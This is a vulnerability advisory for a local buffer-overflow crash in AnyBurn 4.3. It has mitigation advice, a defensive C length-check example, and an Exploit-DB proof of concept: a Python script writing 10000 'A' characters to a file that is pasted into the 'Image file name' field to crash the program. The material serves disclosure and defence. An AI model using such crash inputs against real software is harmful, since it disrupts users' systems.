Vendor: AnyBurn
By: Achilles
CVSS: 7.5 (HIGH)
Denial of Service (DoS) Local Buffer Overflow
CWE: 119
Product Name: AnyBurn
Affected Version From: 4.3 (32-bit)
Affected Version To: 4.3 (32-bit)
Patch Exists: Yes
Related CWE: N/A
CPE: //a:anyburn
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 x64
2018

AnyBurn

AnyBurn is vulnerable to a local buffer overflow that results in a Denial of Service (DoS). The vulnerability is caused by a lack of proper validation of user-supplied input when creating an image file. To trigger it, a file containing a large amount of data is created and its content is copied to the clipboard. When that content is pasted into the 'Image file name' field under the 'Copy disk to Image' option and 'Create Now' is clicked, AnyBurn crashes.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of AnyBurn.
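
For developers, the general defence against this class of bug (CWE-119) is to check the length of the field text before any of it reaches a fixed-size buffer. The following C code is an added example, not AnyBurn's code or the vendor's patch; the function names, the status enum and the 260-byte limit (Windows MAX_PATH) are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

#define IMAGE_NAME_MAX 260  /* assumed limit: Windows MAX_PATH, terminator included */

enum name_status { NAME_OK = 0, NAME_EMPTY, NAME_TOO_LONG, NAME_BAD_ARG };

/* Hypothetical handler for the text of an 'Image file name' field.
 * The unsafe pattern is strcpy(dst, field_text) into a fixed buffer;
 * here the length is established and checked before any byte is copied. */
enum name_status store_image_name(char *dst, size_t dst_size,
                                  const char *field_text, size_t field_cap)
{
    if (dst == NULL || dst_size == 0 || field_text == NULL)
        return NAME_BAD_ARG;
    dst[0] = '\0';  /* fail closed: dst is a valid empty string on any error */

    /* Bounded scan: never reads more than field_cap bytes of the input. */
    const char *nul = memchr(field_text, '\0', field_cap);
    size_t len = nul ? (size_t)(nul - field_text) : field_cap;

    if (len == 0)
        return NAME_EMPTY;
    /* Reject instead of truncating: a cut-off path names a different file. */
    if (len >= dst_size || len >= IMAGE_NAME_MAX)
        return NAME_TOO_LONG;

    memcpy(dst, field_text, len);
    dst[len] = '\0';
    return NAME_OK;
}

/* Constructed input mirroring the 10000-byte "A" buffer on this page. */
int demo_oversized_is_rejected(void)
{
    static char pasted[10000];
    char name[IMAGE_NAME_MAX];
    memset(pasted, 'A', sizeof pasted);  /* deliberately not NUL-terminated */
    return store_image_name(name, sizeof name, pasted, sizeof pasted)
               == NAME_TOO_LONG && name[0] == '\0';
}

int main(void) { return demo_oversized_is_rejected() ? 0 : 1; }
```

In a GUI application the same limit can also be enforced at the input control, but the check in the handler must stay, since clipboard and programmatic input can bypass the control.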

Exploit-DB raw data:

# Exploit Title: AnyBurn
# Date: 15-12-2018
# Vendor Homepage: http://www.anyburn.com/
# Software Link : http://www.anyburn.com/anyburn_setup.exe
# Exploit Author: Achilles
# Tested Version: 4.3 (32-bit)
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow

# Steps to Produce the Crash:
# 1.- Run python code : AnyBurn.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open AnyBurn choose 'Copy disk to Image'
# 4.- Paste the content of EVIL.txt into the field: 'Image file name'
# 5.- Click 'Create Now' and you will see a crash.

#!/usr/bin/env python

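# Test input: 10000 "A" characters (0x41)
buffer = "\x41" * 10000

try:
    # Write the input to Evil.txt so its content can be copied to the clipboard
    with open("Evil.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(buffer))
        f.write(buffer)
    print("[+] File created!")
except IOError:
    print("File cannot be created")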